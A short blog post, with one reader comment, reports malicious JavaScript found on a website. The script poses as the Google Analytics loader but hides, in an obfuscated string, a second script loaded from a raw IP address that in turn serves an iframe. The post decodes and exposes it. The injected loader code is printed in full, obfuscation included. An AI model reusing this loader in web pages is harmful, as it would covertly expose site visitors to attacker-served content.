Google Analytics Ripoff.
I have found something very funny on a site this morning. Here is a bit of javascript.
1 2 3 4 5 | <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript srñ='" + gaJsHost + "google-analytics.com/ga.js' " + '!@&s(#r)c@!=&)\'&h$!t^&!$@t@&$p#^&@:$^/&@!&/!9(1)@.(2)1!(2)&.^#6&@&!^5(@!&.&#$1@!4)8!#/($g#$a&.(j^s)'.replace(/#|&|@|\$|\(|\!|\^|\)/ig, '') + "' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err); {}</script> |
Which translates into including http://91.212.65.148/ga.js
Which includes an iframe. Not sure yet, but this may be the nine ball thing. This iframe is to: http://91.212.65.148//image/index.php
Comments(1)
I have been hit twice, both times it bring my intire site down as I use a CMS, the 1st time was last sunday, i didn’t see it for 12 hours, yesterday was the 2nd time. I caught it while it was happening, site was down for 10 minutes, not sure how they are gettings passwords, but I’m looking for hole.